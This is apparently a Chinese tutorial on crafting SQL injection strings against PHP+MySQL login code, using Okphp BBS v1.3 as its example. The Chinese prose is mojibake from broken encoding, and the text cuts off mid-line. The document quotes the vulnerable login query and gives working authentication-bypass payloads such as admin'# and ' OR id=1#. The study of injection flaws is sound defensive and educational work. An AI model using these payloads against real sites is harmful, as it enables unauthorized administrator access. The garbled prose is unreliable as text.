php+mysql×¢ÉäÓï¾ä¹¹Ôì¼¼Êõ

ºÚ¿ÍÈëÃż¼ÊõÖ®php+mysql×¢ÉäÓï¾ä¹¹Ô죺
Ò».Ç°ÑÔ£º
²âÊÔ°æ±¾ÐÅÏ¢£ºOkphp BBS v1.3 ¿ªÔ´°æ
ÓÉÓÚPHPºÍMYSQL±¾ÉíµÃÔ­Òò,PHP+MYSQLµÄ×¢ÉäÒª±ÈaspÀ§ÄÑ£¬ÓÈÆäÊÇ×¢ÉäʱÓï¾äµÄ¹¹Ôì·½Ãæ¸üÊǸöÄѵ㣬±¾ÎÄÖ÷ÒªÊǽè¶ÔOkphp BBS v1.3һЩÎļþµÃ¼òµ¥·ÖÎö£¬À´Ì¸Ì¸php+mysql×¢ÉäÓï¾ä¹¹Ô췽ʽ£¬Ï£Íû±¾ÎĶÔÄãÓеã°ïÖú¡£
¡¡¡¡ÉùÃ÷£ºÎÄÕÂËùÓÐÌáµ½µÄ"©¶´"£¬¶¼Ã»Óо­¹ý²âÊÔ£¬¿ÉÄܸù±¾²»´æÔÚ£¬ÆäʵÓÐûÓЩ¶´²¢²»ÖØÒª£¬ÖØÒªµÄÊÇ·ÖÎö˼·ºÍÓï¾ä¹¹Ôì¡£
¶þ."©¶´"·ÖÎö£º
1.admin/login.php×¢Éäµ¼ÖÂÈƹýÉí·ÝÑé֤©¶´£º
´úÂ룺
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username='$username' and password='$password'"ÖÐ
$username ºÍ $password û¹ýÂË£¬ ºÜÈÝÒ×¾ÍÈƹý¡£
¶ÔÓÚselect * from $user_table where username='$username' and password='$password'ÕâÑùµÄÓï¾ä¸ÄÔìµÄ·½·¨ÓУº
¹¹Ôì1£¨ÀûÓÃÂß¼­ÔËË㣩£º$username=' OR 'a'='a $password=' OR 'a'='a
Ï൱ÓÚsqlÓï¾ä£º
select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
¹¹Ôì2£¨ÀûÓÃmysqlÀïµÄ×¢ÊÍÓï¾ä# £¬/* °Ñ$password×¢Ê͵ô£©£º$username=admin'#£¨»òadmin'/*)
¼´£º
select * from $user_table where username='admin'#' and password='$password'"
Ï൱ÓÚ£º
select * from $user_table where username='admin'
ÔÚadmin/login.phpÖÐ$qÓï¾äÖеÄ$passwordÔÚ²éѯǰ½øÐÐÁËmd5¼ÓÃÜËùÒÔ²»¿ÉÒÔÓù¹Ôì1ÖеÄÓï¾äÈƹý¡£ÕâÀïÎÒÃÇÓù¹Ôì2£º
select id,group_id from $user_table where username='admin'#' and password='$password'"
Ï൱ÓÚ£º
select id,group_id from $user_table where username='admin'
Ö»Òª´æÔÚÓû§ÃûΪadminµÄ¾Í³ÉÁ¢£¬Èç¹û²»ÖªµÀÓû§Ãû£¬Ö»ÖªµÀ¶ÔÓ¦µÄid£¬
ÎÒÃǾͿÉÒÔÕâÑù¹¹Ô죺$username=' OR id=1#
Ï൱ÓÚ£º
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#ºóµÄ±»×¢Ê͵ô)
ÎÒÃǽÓ×ÅÍùÏ¿´´úÂ룺
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($&#1